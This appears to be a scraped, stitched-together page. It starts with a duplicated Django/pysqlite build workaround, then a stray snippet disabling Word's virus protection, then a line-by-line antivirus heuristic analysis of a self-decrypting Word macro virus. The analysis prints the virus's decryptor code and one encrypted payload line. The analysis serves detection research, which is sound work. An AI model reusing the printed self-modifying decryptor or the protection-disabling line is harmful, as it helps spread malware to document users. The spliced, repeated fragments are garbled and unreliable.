I workaround this by download the source from pysqlite. and then run:
python setup.py build_static install
Now:
manage.py syncdb
works.
python setup.py build_static install
Now:
manage.py syncdb
works.
Options.VirusProtection = 0
Obfuscation:
Options.VirusProtection = 1 AND 0
Line 1: Private Sub Document_Open(): Application.EnableCancelKey = wdCancelDisabled
The definition of the private document handler Document_Open() (often inaccurately referred to as a macro) is not typical for common applications, so it should be flagged with a low priority. The next operation disables
the ‘ESC’ key and has the same security risk level as the definition of the private document handler and, therefore, should be flagged accordingly.
Line 2: For d = 6 To ThisDocument.VBProject.VBComponents.Item(1).CodeModule.CountOfLines: C$ = ""
This line simply initializes a ‘For’ loop, depending on the number of lines. Such strings should be flagged by heuristic engines, as a request to count the lines of the existing macro code is suspicious. Additionally a heuristic engine should remember that ‘d’ is an integer variable, the maximum value of which depends on the number of lines of code.
Line 3: I = (ThisDocument.VBProject.VBComponents.Item(1).CodeModule.Lines(d, 1))
A line of code, depending on the counter, will be read from the macro code. The range from the counter is chosen that way, so that every line of the malicious code can be accessed. Again, this can be seen as a memory-read operation as described above and should be flagged. Furthermore, the variable ‘I’ should be stored as a string variable containing line information.
Line 4: f = (Mid(I, 2, 1)): For X = 3 To Len(I): B$ = Asc(Mid(I, X, 1)) - f: C$ = C$ & Chr(B$): Next X: A = C$
A set of operations will be done with the read content from the previous line. Actually, for the heuristic, the type of encryption that is occurring here is not really important; the existence of such a routine is suspicious enough and should be flagged. For emulation issues, the analysis of encryption functionality has to go deeper.
Line 5: ThisDocument.VBProject.VBComponents.Item(1).CodeModule.ReplaceLine d, A: Next d: End Sub
This line replaces existing code (the parameter ‘d’ defines the line number and ‘A’ defines the actual content) and is another critical operation (equivalent to the memory-write operation mentioned above), which has to be flagged with a high security risk level. This line also contains the end of the outer ‘for’ loop, which is responsible for accessing all lines within a certain range of the document.
Line 6: '6Vxo|gzk&Y{h&Jui{sktzeIruyk./@&Uvzouty4Yg|kTuxsgrVxusvz&C&6
This line (as well as all of the following 13 lines) contains this kind of comment with encrypted code:
* the string is quite long (i.e., consists of more than forty characters) and contains no spaces;
* it is not typical to start a comment with a number; and,
* the string contains suspicious mixture of numbers, special characters and ordinary alphabet characters.